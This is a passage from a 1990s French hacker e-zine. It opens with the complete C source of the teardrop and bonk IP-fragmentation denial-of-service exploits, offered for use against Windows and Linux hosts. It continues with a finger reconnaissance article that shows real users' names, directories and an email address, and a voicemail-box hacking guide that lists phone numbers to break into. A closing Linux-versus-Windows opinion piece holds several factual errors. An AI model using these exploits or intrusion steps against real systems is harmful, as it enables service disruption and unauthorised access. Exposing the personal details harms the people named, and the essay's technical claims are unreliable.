 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
     */
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(0);
}

/* EOF */



___________________________________________________________________________
Analyse du Script     : Bonk.c 
Auteur                : route|deamon9 & klepto
URL de Tlchargement : http://www.technotronic.com
Note sur 10           : 7/10
Note(s) du programme  : Je n'ai pas t capable de le compiller
Fonction(s)           : Crash le patch contre le teadrop
                        Windows 3.1 - Windows 95 - Windows 98
Commantaire(s)        : Si vous trouvez ce qu'il ne marche pas avec le
                        compillateur, dites-le moi svp.

Voici le code : 
 
/*

  [ http://www.technotronic.com.com/ ]

                                ==bendi - 1998==

                        bonk.c        -         5/01/1998
        Based On: teardrop.c by route|daemon9 & klepto
        Crashes *patched* win95/(NT?) machines.

        Basically, we set the frag offset > header length (teardrop
        reversed). There are many theories as to why this works,
        however i do not have the resources to perform extensive testing.
        I make no warranties. Use this code at your own risk.
        Rip it if you like, i've had my fun.

*/

#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST       0x3
#define PADDING         0x1c

struct udp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        datalen=100,
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */

void usage(void)
{
        fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
        exit(0);
}

u_long host_to_ip(char *host_name)
{
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);
}

void quit(char *reason)
{
        perror(reason);
        close(spf_sck);
        exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        int     bs;
        struct  sockaddr_in to;

        memset(&pkt, 0, psize);
                                                /* Fill in ip header */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING);
        pkt.ip.id = htons(0x455);
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IP_UDP;
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* more to come */

        pkt.udp.source = htons(src_prt);        /* udp header */
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;
}

void main(int argc, char *argv[])
{
        u_long  src_addr,
                dst_addr;

        int     i,
                src_prt=53,
                dst_prt=53,
                bs = 1,
                pkt_count = 10;         /* Default amount */

        if (argc < 3)
                usage();

        if (argc == 4)
                pkt_count = atoi(argv[3]);      /* 10 does the trick */

        /* Resolve hostnames */

        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i)
        {
                fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
                usleep(10000);
        }

        printf("Done.\n");
}


Conclusion : Donc, voil pour ce zine. Continuer  le lire et souvenez-vous qu'
             chaque ezine que Pyro-Phreak mag va sortir, il va y avoir une section
             comme cella qui va vous faire part des bons programmes qu'il existe.

   					    




____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                              Finger                   
'.________  __ __ ___________ ____ ______________ ____Par [G]r4FX__ __

Le programme finger permet d'obtenir des informations sur une personne. Le 
problme de ce programme c'est qui peut tre utilis pour dcouvrir
des nom de login sur un ordinateur : 

finger @193.51.222.81
[msb31u01.u-3mrs.fr]

Welcome to Linux version 2.0.29 at msb31u01.u-3mrs.fr !

 11:34am  up 6 days, 17:28,  4 users,  load average: 0.29, 0.33, 0.29

Login    Name                 Tty  Idle  Login Time   Office     Office Phone
jeannejy Jeannette Jean Yves   p1     3  Mar 25 11:30 (:0.0)
paperap  Papera Pierre         p3        Mar 25 11:34 (MSB31U04.U-3MRS.)
poggij   Poggi Jerome          1         Mar 25 11:33
root     Supper User           2         Mar 25 11:33



Cette commande affiche le nom des personnes qui sont connectes sur l'ordinateur 
193.51.222.81, de plus il indique des informations tel que : le
temps d'inactivit, l'heure de login ... 

Tandis que la commande : 

finger poggij@msb31u01.u-3mrs.fr
[msb31u01.u-3mrs.fr]

Welcome to Linux version 2.0.29 at msb31u01.u-3mrs.fr !

 11:34am  up 6 days, 17:28,  4 users,  load average: 0.29, 0.33, 0.29

Login: poggij                           Name: Poggi Jerome
Directory: /home/duii2/poggij         Shell: /bin/bash
On since Tue Mar 25 11:33 (MET DST) on tty1   29 seconds idle
Mail last read Tue Mar 25 11:33 1997 (MET DST)
Plan:
                  \\_//
                  (, ,)
|-------------oOOo-(_)-oOOo---------------------------|
 Diplome Universitaire d'Ingenierie Informatique
 Faculte des Sciences et Technique d'Aix-Marseille III
 Avenue Escadrille Normandie Niemen
 13397 MARSEILLE Cedex 20
|-----------------------------------------------------|
 Home page:    http://msb31u01.u-3mrs.fr/~poggij
 E-Mail:       mailto:jerome.poggi@usa.net
|-----------------------------------------------------|



affiche des informations sur la personne tel que : 

     dernire heure de connexion 
     nom rel 
     directory de travail 
     ... 

Cette commande est trs utilis pour dcouvrir des informations sur les comptes 
des utilisteurs. Elle peut tre remplac par une commande safe_finger fournis 
dans le pack tcp_wrapper, qui elle ne donne que trs peu d'informations. 

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                     Encore les VMBs
'.________  __ __ ___________ ____ ______________ ____Par Neuro__ __

Voici le menu d'une VMB typique du Quebec et meme de France! Pour acceder
a ce menu, faut bien entendu avoir russi a cracker le password!
En passant, c pas un rip de NPC. J'ai prit ma petite enregistreuse pour 
prendre ca en note. Voici le menu en question:

Numero de tel   boite vocale
81 boite vocal#pass#

       2-coute
       4-Message Prcdant
       6-Message suivant 
       7*------0-Modaliter d'envois
              1-Rponse
              2-Choisis de l'envelloppe
     	      3-Racheminement
              4-Rponse diffuse
              5-Cration d'un message
              6-effacement
              9-envoie
              #-Quitter ce mode

       8*-----0-Modaliter de la boite vocale
                       1-Modifier le numero d'assistance direct
                       #-Quitter ce mode
              1-Acces
              2-Message d'accueil
                       1-Message d'accueil destiner au message externe
                       2-Message d'accueil destiner au message interne
                       *-Ecouter la liste de nouveau
                       #-Quitter ce mode
              3-Sortit
              4-Mot de passe
              5-Liste de diffusion
              6-Positionnement Direct
              9-Identification personnalise
                       4-Pour quitter
                       5-Pour enregistrer le nom dans le message personnalis
              #-Quitter ce mode
       9-Rapel de l'expditeur
      71-Rponse
      73-Racheminement
      74-Rponse diffuse
      76-Effacement
       *-Plus de renseignements

A chaque zine, j'ai dcider de vous donner quelques VMBs a hacker, question
de mettre la thorie en Pratique,dsoler pour les Francais.

1-800-468-9510 
1-800-468-9513  
1-800-468-9515 
1-800-468-1498 
1-800-468-5270          (Scan by Psykaos)
1-800-468-5290 
1-800-468-6320 
1-800-468-6321 
1-800-468-6322 
1-800-468-6324  

 

____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                            Linux vs Windows                  
'.________  __ __ ___________ ____ ______________ ____Par endrix__ __






                       O=======================O
                      <|I n t r o d u c t i o n|>
                       O=======================O



  Bon, pourquoi j'ai crit cet article ?? Hey bien parce que il y a 
tellement de personne qui viennent me voir sur irc pour me demander des 
questions comme celle qui suivent : 

"C'est quoi la diffrence entre Windows et Linux ???"
"Pourquoi tant de personne ont adopt le OS linux ???"
"Pourquoi que les logiciels de linux sont moins cher ???"
et bien d'autres ....

 Donc dans ce texte, je vais vous dire les diffrences entre Windows, qui
a t cre par Bill Gates et sont quipe et Linux qui a t cre au dbut
par un jeune pirate informatique du nom de Linus B. Torvalds, les
avantages, les dsavantages.... 

 Alors, s'il y a encore une personne sur internet qui vient me voir pour me
demander ca, je vais lui dire tout simplement d'aller voir cet e-zine.




                                 O=========O
                                <|L i n u x|>
                                 O=========O


Histoire :

 Donc, comme j'ai dit dans l'introduction, Linux a t concu au dbut par un
jeune pirate informatique de l'Universit d'Helsinki, en finlande, Linus B. Torvalds 
qui avait 21 ans, en 1991. Il dcide de construire sont systme d'exploitation(OS)
parce que sont budjet d'tudiant ne lui permettait pas de pouvoir s'acheter les
logiciels sur le march et qui taient a l'poque, pas trs fiable. Donc, en 3
mois, Linus crit environs 10 000 lignes de code de programme et soumet sont 
travail a une dixaines de correspondants sur l'internet. Donc au fur et a mesure
que sont projet avancait, de plus en plus d'internaute-programmeur ont rejoint
l'quipe, d'environs 150, qui en 1992 ont sorti le premire version du systme
d'exploitation qui se nomma Linux.

 Aprs la sorti de cette verion, Linus recoit des quatres coins de la plante des
sources, des programmes, des suggestions, des commantaires, des contributions pour
amilior Linux. Aprs cela, linux ce transmet de main en main, d'internaute 
internaute, maintenant des centaines de milliers de personnes ont adopt ce systme
d'exploitation et le OS va connatre ca gloire et servira mme a faire les trucages
dans le film Titanic. 
             
  qui faut devoir le succss de Linux ??? Hey bien c'est a tout les utilisateurs du 
programme maintenant. Pour un teste, allez sur le cannal #hack.fr ou #phreak.fr et 
demandez conbien de personne on Linux ou encore combien de personne sont en linux 
prsentement. Vous allez voir que l'utilisateur de linux est trs nombreux.
Je peux dire que presque tout le monde dans ca vie qui a adopt linux a pass
par Windows. Linux est un systme d'exploitation pour l'utilisateur plus avanc
du Pc.


Mais quel est le vrai avantage de Linux ??? 

 D'aprs moi, le vrai avantage de linux c'est que les sources des programmes sont  la 
port de la main. Tout les programmes pour linux viennent avec la source. Donc, 
comparativement  Windows, tu n'as pas besoin d'aller suivre un cours de programmation
ou dpensser 60$ pour un livre de programmation. Juste avec les sources, vous pouvez trs
bien apprendre. On apprend avec les exemples et les sources sont les exemples. Donc, finnit
les virus ou les trojans. Avant de compiller un programme en linux vous pouvez aller voir
s'il peut faire des daumages a votre systeme et s'il en fait, flushhhh !!!! ou vous pouvez
le modifier afin qu'il n'en fasse plus. En windows, pour savoir ce que fait un .exe dj 
compiller et que 0.00000001% du temps la source vient avec le programme vous pouvez l'editer
mais pour cela il faudra un editeur exadcimal et il vous faudra une bonne comprension du 
language de programmation, l'assembleur. 


Interface graphique ou en texte mode ???

heehe, cet question je l'ai entendu trs souvent. Linux vient en plusieur version et en voici
quelques une :

- Red Hat
- Debian
- Slackware

 Ces versions sont les plus connues. Linux viens avec une interface graphique et en text mode.
Umpeu comme Windows et DOS. La diffrence c'est que windows veut illiminer le Texte mode et que
tout soit user friendly mais linux lui garde le texte mode parce que vous ferez le test, le texte
mode est beaucoup plus rapide. Mais je peux dire que l'interface graphique de Linux est loin du 
GuI de windows. il y a plusieur facon de mettre un interface graphique en linux. Il y a litestep,
windows maker, x-windows ... Moi personnellement j'aime bien X-Windows :)


Stable ou instable ????


 Ce qui fait la force de linux est que les sources sont ouvert au public mais aussi c'est 
que linux est le systme d'exploitation le plus stable qu'il y a jusqu' maintenant. C'est 
pourquoi que l'arme amricaine et l'arme francaise utilise le OS linux. La moiti des 
serveurs sur l'internet sont en linux et l'autre moiti sont en Windows NT et quelques un 
en Window 95/3.1 ... Naon, en Linux il n'y a pas de BLUE SCREEN !!!!!!


Compatible ou pas ???


 Ceci est le gros problme de linux et mme Apple ; la compatibilit. Maintenant il y a 
beaucoup de programme fait en linux, comme Corel WordPerfect main maintenant des versions 
en linux mais ca n'arrive pas a la cheville des programmes qui sont fait pour Windows. 
N'espr pas pouvoir jouer  un jeux super en linux. Mais les progammes qui sont les plus 
utiliss sur l'internet ont t fait n linux comme : Netscape, ICQ, WinAMp, Corel 
Wordperfect... Et si vous aimez faire de l'infographie, vous aimerez le programme Gimp 
qui je crois a une lgre avance sur Photoshop. 


Rapide ou pas ???

 Hey bien, Linux est beaucoup en texte mode alors il est beaucoup plus rapide mais il y 
a aussi un avantage  windows. Il utilise beaucoup moins de RAM. Linux utilise un systeme 
de swap memory qui est sur votre disque dur. De cette manire, la vitesse a t aument 
de beaucoup.


Facile pour utilisation ???

HeY bien, je trouve pas. Pour le monde qui sont abitu en linux ils aiment ca mais moi...
j'aime umpeu plus la manire de windows.

Windows [-=-]  Piton Install
Linux   [-=-]  Compillation, librairie.... pffff....




                                O=============O
                               <|W i n d o w s|>
                                O=============O


Histoire :

Micro$oft, qui a t premirement partie par Bill Gates(yerkk) qui a commenc ca compagnie
 l'ge de 14 ans. il a commenc  vendre ces programmes  14... WAW !!! euhhhh.... C'est
tout ce que j'ai pu trouv sur Bill Gates et Microsoft.... Mais je peux dire que Windows
maintenant a tellement de pouvoir, que Bill Gates commence a s'enfler la tte avec ca.
Windows, maintenant, est plus utilis comme un outil de domination que d'autre chose. Il
est fais de manire trs vite et plein de bug. Teadrop, Nuke, OOB nuke.... Tout ca sont
des "bugs" que Microsoft on pas pens parce qu'il tait trop press  sortir le systme
d'exploitation.



Quel est le vrai avantage de Window sur linux :

Le vrai avantage de Windows sur Linux est ca compatibilit, ca facilit d'utilisation et 
sont suppos Plug-and-play. Ben, moi j'appele plus ca plus-and-pray ... heheehhe :) Parce 
que souvent, le plus-and-play crash.... CA veut dire, entrez votre matriel sans avoir a 
le configur et il va marcher tout seul..... yeah right... en tk... Il faut avouer que 
c'est windows qui a partit le monde de l'informatique. Sans microsoft, nous serions encore 
 l'ge ed pierre avec des interfaces en texte ou tout le monde serait en Mac. Parce que 
en passsant, c'est Mac qui a premirement pens au bouton dmarrer. Presque tout ce qu'on
trouve sur le web, est compatible avec Microsoft Windows. Il a t plus concu pour les 
dbutants alors si vous tes un utilisateur avanc du Pc, windows risque de vous frustrez 
plus que d'autre chose.


Interface graphique ou en texte mode ???

L'interface graphique de windows est trs bien. Tout ce fait sans avoir a aller en dos. 
Mais, elle contient plusieurs mais plusieurs bugs.... Mais, il y a quelques fonctions que 
j'aime bien qui sont en DOS comme le nbtstat, net use, net view, tracert..... Parfois, le
dos peux trs bien servir comme pour faire ca dir/s/w > dir.txt c'est dur  faire en 
windows ...


Stable ou instable ????

hehehehhehehe BLUE SCREEEEEEEEEEEEEEEEEEEEEEEEEEEEEENNNN !!!!!! AHHHHHHhhhhhh !!!!! explorer.exe
plante touttttttt le temps... Vive les blues screens... :) Windows est une machine a plant
mais si vous le connaissez bien, vous trouverez ce qu'il le fait plant et vous allez faire 
pour qu'il ne vous plante pu dans la face. Windows est le systme d'exploitation le plus 
instable qu'il y a jusqu' maintenant.


Rapide ou pas ???

Windows, d'aprs moi, gobe beaucoup trop de mmoire ram. Comparativement  linux, il n'utilise
pas de mmoire swap(sur le hd) alors il ne fait qu'utiliser le RAM. Juste pour vous dire, 
windows 2000 a besoin de 64meg de RAM. Mais, linux est beaucoup rapide


____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #2              
:                   
|                            Conclusion                    
'.________  __ __ ___________ ____ ______________ ____Par Neuro__ __

bon c dja la fin du #2 de pyrofreakmag . J'espere que vous avez aimer, tk.
Si vous dsirer faire publier votre article dans le #3, envoyez le a
pyrofreakmag@hotmail.com , ou via IRC (#phreak.fr UNDERNET)
Site web:http://pyrofreak.cjb.net . Envoyer nous vos questions par e-mail, 
on va faire notre possible pour y rpondre dans un FAQ qu'on va faire dans 
le #3. Le #3 est fixer pour environ le 1er avril. Pour commentaires
ou suggestions : pyrofreakmag@hotmail.com 
J'aimerais remercier:
Toute l'quipe de pyrofreak
Maniak d'avoir changer d'avis, j'espere qui rechangera pas a nouveau.
Darkbug, de distribuer notre zine sur son site web.
Nos supporteurs sur #phreak.fr via Undernet
Tient Nuclear une petite pub pour ton server 
/server shell.optima-dialup.com 6667   #mtl.server   (krusnet) vener nous 
voir.

@@@@@@@@@@@@@@@@@@@@Pyrofreakmag touts droits rservs@@@@@@@@@@@@@@@@@@@@@@
